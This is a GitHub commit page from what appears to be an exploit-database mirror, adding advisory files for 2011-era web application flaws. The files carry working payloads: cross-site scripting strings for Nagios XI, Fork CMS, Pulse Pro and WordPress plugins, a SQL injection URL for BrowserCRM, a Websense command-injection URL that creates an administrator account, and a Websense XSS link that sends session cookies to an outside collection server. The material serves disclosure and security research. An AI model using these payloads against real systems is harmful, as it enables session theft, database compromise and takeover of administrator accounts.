Skip to content

Commit b3e4367

Browse files
author
Offensive Security
committed
DB: 2015-03-21
19 new exploits
1 parent 9a428f4 commit b3e4367

20 files changed

Lines changed: 323 additions & 0 deletions

File tree

files.csv

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -32863,3 +32863,22 @@ id,file,description,date,author,platform,type,port
3286332863
36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
3286432864
36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
3286532865
36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0
32866+
36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-13,Am!r,php,webapps,0
32867+
36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting Vulnerability",2011-12-31,Am!r,php,webapps,0
32868+
36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
32869+
36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0
32870+
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32871+
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32872+
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32873+
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 license/index.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32874+
36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 licence/view.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32875+
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32876+
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
32877+
36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0
32878+
36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0
32879+
36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32880+
36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32881+
36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
32882+
36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
32883+
36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
32884+
36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0

platforms/cgi/webapps/36457.txt

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
source: http://www.securityfocus.com/bid/51085/info
2+
3+
Websense Triton is prone to a cross-site scripting vulnerability.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
This issue affects the following applications:
8+
9+
Websense Web Security Gateway Anywhere v7.6
10+
Websense Web Security Gateway v7.6
11+
Websense Web Security v7.6
12+
Websense Web Filter v7.6
13+
14+
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
15+
16+
Send the current session-cookies to a credentials-collection server:
17+
18+
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http://192.168.1.64/"%2bencodeURIComponent(document.cookie))</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360

platforms/cgi/webapps/36458.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/51086/info
2+
3+
Websense Triton is prone to a remote command-execution vulnerability.
4+
5+
An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
6+
7+
https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|

platforms/cgi/webapps/36459.txt

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/51087/info
2+
3+
Multiple Websense products are prone to an authentication-bypass vulnerability.
4+
5+
Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
6+
7+
The following Websense products are affected:
8+
9+
Websense Web Security Gateway Anywhere 7.6
10+
Websense Web Security Gateway 7.6
11+
Websense Web Security 7.6
12+
Websense Web Filter 7.6
13+
14+
https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def

platforms/multiple/remote/36455.txt

Lines changed: 99 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,99 @@
1+
source: www.securityfocus.com/bid/51069/info
2+
3+
Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
6+
7+
Nagios XI versions prior to 2011R1.9 are vulnerable.
8+
9+
Reflected XSS
10+
-----
11+
12+
Page: /nagiosxi/login.php
13+
Variables: -
14+
PoCs: http://site/nagiosxi/login.php/";alert(&#039;0a29&#039;);"
15+
Details: The URL is copied into JavaScript variable &#039;backend_url&#039; in an unsafe
16+
manner
17+
Also affects:
18+
/nagiosxi/about/index.php
19+
/nagiosxi/about/index.php
20+
/nagiosxi/about/main.php
21+
/nagiosxi/account/main.php
22+
/nagiosxi/account/notifymethods.php
23+
/nagiosxi/account/notifymsgs.php
24+
/nagiosxi/account/notifyprefs.php
25+
/nagiosxi/account/testnotification.php
26+
/nagiosxi/help/index.php
27+
/nagiosxi/help/main.php
28+
/nagiosxi/includes/components/alertstream/go.php
29+
/nagiosxi/includes/components/alertstream/index.php
30+
/nagiosxi/includes/components/hypermap_replay/index.php
31+
/nagiosxi/includes/components/massacknowledge/mass_ack.php
32+
/nagiosxi/includes/components/xicore/recurringdowntime.php/
33+
/nagiosxi/includes/components/xicore/status.php
34+
/nagiosxi/includes/components/xicore/tac.php
35+
/nagiosxi/reports/alertheatmap.php
36+
/nagiosxi/reports/availability.php
37+
/nagiosxi/reports/eventlog.php
38+
/nagiosxi/reports/histogram.php
39+
/nagiosxi/reports/index.php
40+
/nagiosxi/reports/myreports.php
41+
/nagiosxi/reports/nagioscorereports.php
42+
/nagiosxi/reports/notifications.php
43+
/nagiosxi/reports/statehistory.php
44+
/nagiosxi/reports/topalertproducers.php
45+
/nagiosxi/views/index.php
46+
/nagiosxi/views/main.php
47+
48+
Page: /nagiosxi/account/
49+
Variables: xiwindow
50+
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert(&#039;0a29&#039;)</script>
51+
52+
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php
53+
Variables: -
54+
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/&#039;><script>alert("0a29")</script>
55+
56+
Page: /nagiosxi/includes/components/xicore/status.php
57+
Variables: hostgroup, style
58+
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=&#039;><script>alert("0a29")</script>
59+
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>
60+
61+
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php
62+
Variables: -
63+
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/&#039;;}}alert(&#039;0a29&#039;)</script>
64+
65+
66+
Page: /nagiosxi/reports/alertheatmap.php
67+
Variables: height, host, service, width
68+
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
69+
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
70+
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
71+
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>
72+
73+
Page: /nagiosxi/reports/histogram.php
74+
Variable: service
75+
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
76+
77+
Page: /nagiosxi/reports/notifications.php
78+
Variables: host, service
79+
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
80+
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>
81+
82+
Page: /nagiosxi/reports/statehistory.php
83+
Variables: host, service
84+
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
85+
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>
86+
87+
88+
Stored XSS
89+
-----
90+
91+
Page: /nagiosxi/reports/myreports.php
92+
Variable: title
93+
Details: It is possible to store XSS within &#039;My Reports&#039;, however it
94+
is believed this
95+
is only viewable by the logged-in user.
96+
1) View a report and save it, e.g.
97+
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
98+
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>
99+

platforms/php/webapps/36444.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/51031/info
2+
3+
flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss]

platforms/php/webapps/36445.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/51037/info
2+
3+
The Welcomizer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss]

platforms/php/webapps/36446.txt

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
source: http://www.securityfocus.com/bid/51045/info
2+
3+
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Fork CMS 3.1.5 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/blog/detail/article?utm_source=feed&utm_medium=rss"><script>alert(&#039;xss&#039;)</script>
10+
11+
http://www.example.com/search?form=search&q_widget=&submit="><script>alert(&#039;xss&#039;)</script>
12+
13+
http://www.example.com/search?form=search&q_widget="><script>alert(&#039;xss&#039;)</script>
14+
15+
http://www.example.com/search?form="><script>alert(&#039;xss&#039;)</script>
16+
17+
http://www.example.com/private/en/users/edit?id=1"><script>alert(&#039;xss&#039;)</script>
18+
19+
http://www.example.com/private/en/pages/edit?token=true&id=1"><script>alert(&#039;xss&#039;)</script>
20+
21+
http://www.example.com/private/en/mailmotor/settings?token="><script>alert(&#039;xss&#039;)</script>

platforms/php/webapps/36447.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/51056/info
2+
3+
Pulse Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Pulse Pro 1.7.2 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/index.php?p=blocks&d="><script>alert(1)</script>
10+
http://www.example.com/index.php?p=edit-post&post_id="><script>alert(1)</script>

platforms/php/webapps/36448.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/51060/info
2+
3+
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
4+
5+
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
8+
9+
http://www.example.com/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20--%202

0 commit comments

Comments
 (0)